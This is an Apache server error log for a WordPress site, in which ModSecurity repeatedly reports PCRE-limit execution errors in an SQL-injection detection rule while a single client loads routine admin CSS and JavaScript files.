[Tue Aug 29 09:26:47.826488 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/imgareaselect/imgareaselect.css"] [unique_id "ZO1XZ8Co-f0AAPgK@HwAAAAI"]
[Tue Aug 29 09:26:47.831376 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/colormag/inc/admin/css/admin.css"] [unique_id "ZO1XZ8Co-f0AAPgD0b4AAAAO"]
[Tue Aug 29 09:26:47.833566 2023] [:error] [pid 63499] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/colormag/inc/admin/css/admin.css"] [unique_id "ZO1XZ8Co-f0AAPgLalkAAAAJ"]
[Tue Aug 29 09:26:47.841433 2023] [:error] [pid 63504] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/google-captcha/bws_menu/css/jquery-ui-styles/1.12.1/jquery-ui.css"] [unique_id "ZO1XZ8Co-f0AAPgQWq0AAAAM"]
[Tue Aug 29 09:26:47.841496 2023] [:error] [pid 63504] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/google-captcha/bws_menu/css/jquery-ui-styles/1.12.1/jquery-ui.css"] [unique_id "ZO1XZ8Co-f0AAPgQWq0AAAAM"]
[Tue Aug 29 09:26:47.842797 2023] [:error] [pid 63512] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/google-captcha/bws_menu/css/general_style.css"] [unique_id "ZO1XZ8Co-f0AAPgY6ncAAAAW"]
[Tue Aug 29 09:26:47.842856 2023] [:error] [pid 63512] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/google-captcha/bws_menu/css/general_style.css"] [unique_id "ZO1XZ8Co-f0AAPgY6ncAAAAW"]
[Tue Aug 29 09:26:47.848260 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/load-scripts.php"] [unique_id "ZO1XZ8Co-f0AAPgK@H0AAAAI"]
[Tue Aug 29 09:26:47.848321 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/load-scripts.php"] [unique_id "ZO1XZ8Co-f0AAPgK@H0AAAAI"]
[Tue Aug 29 09:26:47.849794 2023] [:error] [pid 63499] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/disable-xml-rpc-api/admin/admin.js"] [unique_id "ZO1XZ8Co-f0AAPgLaloAAAAJ"]
[Tue Aug 29 09:26:47.849860 2023] [:error] [pid 63499] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/disable-xml-rpc-api/admin/admin.js"] [unique_id "ZO1XZ8Co-f0AAPgLaloAAAAJ"]
[Tue Aug 29 09:26:47.851633 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/google-captcha/bws_menu/js/general_script.js"] [unique_id "ZO1XZ8Co-f0AAPgD0b8AAAAO"]
[Tue Aug 29 09:26:47.851690 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/google-captcha/bws_menu/js/general_script.js"] [unique_id "ZO1XZ8Co-f0AAPgD0b8AAAAO"]
[Tue Aug 29 09:26:47.867429 2023] [:error] [pid 63504] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/load-scripts.php"] [unique_id "ZO1XZ8Co-f0AAPgQWq4AAAAM"]
[Tue Aug 29 09:26:47.867494 2023] [:error] [pid 63504] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/load-scripts.php"] [unique_id "ZO1XZ8Co-f0AAPgQWq4AAAAM"]
[Tue Aug 29 09:26:47.870489 2023] [:error] [pid 63512] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/common.min.js"] [unique_id "ZO1XZ8Co-f0AAPgY6ngAAAAW"]
[Tue Aug 29 09:26:47.870549 2023] [:error] [pid 63512] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/common.min.js"] [unique_id "ZO1XZ8Co-f0AAPgY6ngAAAAW"]
[Tue Aug 29 09:26:47.872825 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/svg-painter.js"] [unique_id "ZO1XZ8Co-f0AAPgD0cAAAAAO"]
[Tue Aug 29 09:26:47.872882 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/svg-painter.js"] [unique_id "ZO1XZ8Co-f0AAPgD0cAAAAAO"]
[Tue Aug 29 09:26:47.875416 2023] [:error] [pid 63499] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/heartbeat.min.js"] [unique_id "ZO1XZ8Co-f0AAPgLalsAAAAJ"]
[Tue Aug 29 09:26:47.892524 2023] [:error] [pid 63512] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/wp-auth-check.min.js"] [unique_id "ZO1XZ8Co-f0AAPgY6nkAAAAW"]
[Tue Aug 29 09:26:47.897785 2023] [:error] [pid 63499] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/backbone.min.js"] [unique_id "ZO1XZ8Co-f0AAPgLalwAAAAJ"]
[Tue Aug 29 09:26:47.898801 2023] [:error] [pid 63504] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/shortcode.min.js"] [unique_id "ZO1XZ8Co-f0AAPgQWq8AAAAM"]
[Tue Aug 29 09:26:47.906426 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/wp-backbone.min.js"] [unique_id "ZO1XZ8Co-f0AAPgW9wwAAAAU"]
[Tue Aug 29 09:26:47.915480 2023] [:error] [pid 63504] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/plupload/wp-plupload.min.js"] [unique_id "ZO1XZ8Co-f0AAPgQWrAAAAAM"]
[Tue Aug 29 09:26:47.915482 2023] [:error] [pid 63512] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/media-models.min.js"] [unique_id "ZO1XZ8Co-f0AAPgY6noAAAAW"]
[Tue Aug 29 09:26:47.922868 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/jquery/ui/sortable.min.js"] [unique_id "ZO1XZ8Co-f0AAPgW9w0AAAAU"]
[Tue Aug 29 09:26:47.922869 2023] [:error] [pid 63499] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/jquery/ui/mouse.min.js"] [unique_id "ZO1XZ8Co-f0AAPgLal0AAAAJ"]
[Tue Aug 29 09:26:47.930654 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/mediaelement/mediaelement-and-player.min.js"] [unique_id "ZO1XZ8Co-f0AAPgD0cEAAAAO"]
[Tue Aug 29 09:26:47.931917 2023] [:error] [pid 63504] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/mediaelement/mediaelement-migrate.min.js"] [unique_id "ZO1XZ8Co-f0AAPgQWrEAAAAM"]
[Tue Aug 29 09:26:47.935276 2023] [:error] [pid 63512] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/mediaelement/wp-mediaelement.min.js"] [unique_id "ZO1XZ8Co-f0AAPgY6nsAAAAW"]
[Tue Aug 29 09:26:47.951075 2023] [:error] [pid 63499] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/api-request.min.js"] [unique_id "ZO1XZ8Co-f0AAPgLal4AAAAJ"]
[Tue Aug 29 09:26:47.961343 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/dist/dom-ready.min.js"] [unique_id "ZO1XZ8Co-f0AAPgK@H4AAAAI"]
[Tue Aug 29 09:26:47.962811 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/dist/a11y.min.js"] [unique_id "ZO1XZ8Co-f0AAPgW9w4AAAAU"]
[Tue Aug 29 09:26:47.967788 2023] [:error] [pid 63512] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/clipboard.min.js"] [unique_id "ZO1XZ8Co-f0AAPgY6nwAAAAW"]
[Tue Aug 29 09:26:47.967809 2023] [:error] [pid 63504] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/media-views.min.js"] [unique_id "ZO1XZ8Co-f0AAPgQWrIAAAAM"]
[Tue Aug 29 09:26:47.970546 2023] [:error] [pid 63499] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/media-editor.min.js"] [unique_id "ZO1XZ8Co-f0AAPgLal8AAAAJ"]
[Tue Aug 29 09:26:47.972335 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/media-audiovideo.min.js"] [unique_id "ZO1XZ8Co-f0AAPgD0cIAAAAO"]
[Tue Aug 29 09:26:47.984945 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/mce-view.min.js"] [unique_id "ZO1XZ8Co-f0AAPgK@H8AAAAI"]
[Tue Aug 29 09:26:47.984970 2023] [:error] [pid 63512] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/imgareaselect/jquery.imgareaselect.min.js"] [unique_id "ZO1XZ8Co-f0AAPgY6n0AAAAW"]
[Tue Aug 29 09:26:47.986846 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/image-edit.min.js"] [unique_id "ZO1XZ8Co-f0AAPgW9w8AAAAU"]
[Tue Aug 29 09:26:47.986914 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/image-edit.min.js"] [unique_id "ZO1XZ8Co-f0AAPgW9w8AAAAU"]
[Tue Aug 29 09:26:47.988269 2023] [:error] [pid 63499] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/colormag/js/image-uploader.min.js"] [unique_id "ZO1XZ8Co-f0AAPgLamAAAAAJ"]
[Tue Aug 29 09:26:47.990176 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/colormag/inc/admin/js/plugin-handle.js"] [unique_id "ZO1XZ8Co-f0AAPgD0cMAAAAO"]
[Tue Aug 29 09:26:47.996784 2023] [:error] [pid 63504] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/disable-xml-rpc-api/lib/admin-notices/dismiss-notice.js"] [unique_id "ZO1XZ8Co-f0AAPgQWrMAAAAM"]
[Tue Aug 29 09:26:47.996900 2023] [:error] [pid 63504] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/disable-xml-rpc-api/lib/admin-notices/dismiss-notice.js"] [unique_id "ZO1XZ8Co-f0AAPgQWrMAAAAM"]
[Tue Aug 29 09:26:48.127217 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/google-captcha/bws_menu/fonts/bwsicons.ttf"] [unique_id "ZO1XaMCo-f0AAPgW9xAAAAAU"]
[Tue Aug 29 09:26:48.127324 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/google-captcha/bws_menu/fonts/bwsicons.ttf"] [unique_id "ZO1XaMCo-f0AAPgW9xAAAAAU"]
[Tue Aug 29 09:26:57.594720 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/index.php"] [unique_id "ZO1XccCo-f0AAPgD0cQAAAAO"]
[Tue Aug 29 09:26:57.594846 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/index.php"] [unique_id "ZO1XccCo-f0AAPgD0cQAAAAO"]
[Tue Aug 29 09:26:59.227239 2023] [:error] [pid 63507] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/thickbox/thickbox.css"] [unique_id "ZO1Xc8Co-f0AAPgTyesAAAAQ"]
[Tue Aug 29 09:26:59.229013 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/load-styles.php"] [unique_id "ZO1Xc8Co-f0AAPgD0cUAAAAO"]
[Tue Aug 29 09:26:59.229072 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/load-styles.php"] [unique_id "ZO1Xc8Co-f0AAPgD0cUAAAAO"]
[Tue Aug 29 09:26:59.231944 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/video-popup/tinymce/css/tinymce.css"] [unique_id "ZO1Xc8Co-f0AAPgK@IAAAAAI"]
[Tue Aug 29 09:26:59.232011 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/video-popup/tinymce/css/tinymce.css"] [unique_id "ZO1Xc8Co-f0AAPgK@IAAAAAI"]
[Tue Aug 29 09:26:59.234370 2023] [:error] [pid 63508] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/limit-login-attempts-reloaded/assets/css/jquery-ui.css"] [unique_id "ZO1Xc8Co-f0AAPgUgwoAAAAR"]
[Tue Aug 29 09:26:59.234437 2023] [:error] [pid 63508] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/limit-login-attempts-reloaded/assets/css/jquery-ui.css"] [unique_id "ZO1Xc8Co-f0AAPgUgwoAAAAR"]
[Tue Aug 29 09:26:59.235515 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/css/editor.min.css"] [unique_id "ZO1Xc8Co-f0AAPgW9xEAAAAU"]
[Tue Aug 29 09:26:59.239551 2023] [:error] [pid 63511] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/video-popup/admin/css/meta-row-style.css"] [unique_id "ZO1Xc8Co-f0AAPgXNjMAAAAV"]
[Tue Aug 29 09:26:59.239609 2023] [:error] [pid 63511] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/video-popup/admin/css/meta-row-style.css"] [unique_id "ZO1Xc8Co-f0AAPgXNjMAAAAV"]
[Tue Aug 29 09:26:59.246887 2023] [:error] [pid 63507] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/load-scripts.php"] [unique_id "ZO1Xc8Co-f0AAPgTyewAAAAQ"]
[Tue Aug 29 09:26:59.246972 2023] [:error] [pid 63507] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/load-scripts.php"] [unique_id "ZO1Xc8Co-f0AAPgTyewAAAAQ"]
[Tue Aug 29 09:26:59.248494 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/limit-login-attempts-reloaded/assets/js/chart.umd.js"] [unique_id "ZO1Xc8Co-f0AAPgK@IEAAAAI"]
[Tue Aug 29 09:26:59.248554 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/limit-login-attempts-reloaded/assets/js/chart.umd.js"] [unique_id "ZO1Xc8Co-f0AAPgK@IEAAAAI"]
[Tue Aug 29 09:26:59.258072 2023] [:error] [pid 63511] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/dist/vendor/lodash.min.js"] [unique_id "ZO1Xc8Co-f0AAPgXNjQAAAAV"]
